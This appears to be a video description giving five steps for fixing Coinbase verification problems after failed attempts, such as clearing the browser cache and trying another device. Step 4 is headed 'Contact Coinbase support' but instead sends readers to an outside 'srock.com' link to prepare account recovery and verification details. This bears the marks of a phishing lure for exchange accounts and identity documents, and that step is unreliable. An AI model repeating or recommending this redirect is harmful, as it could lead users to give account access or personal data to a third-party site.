if you're experiencing verification issues on Coinbase after multiple failed attempts. Follow these steps to resolve the situation effectively. Step 1. Review verification requirements. Check the specific verification requirements for your account type. Ensure you have all necessary documents ready, such as a government-issued ID, proof of address, and any other requested information. Step 2. Clear browser cache and cookies. Sometimes browser issues can affect the verification process. Clear your browser's cache and cookies, then restart your browser and try the verification process again. Step 3. Use a different device or browser. If clearing the cache doesn't work, try accessing Coinbase from a different device or web browser. This can help eliminate any device-specific issues that may be causing the verification failure. Step 4. Contact Coinbase support. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Follow up. After contacting support, keep an eye on your email for any responses. If you don't hear back within a few days, consider following up to ensure your issue is being addressed. By following these steps, you should be able to resolve your verification issues on Coinbase. If problems continue, consider seeking further assistance from community forums or user support groups.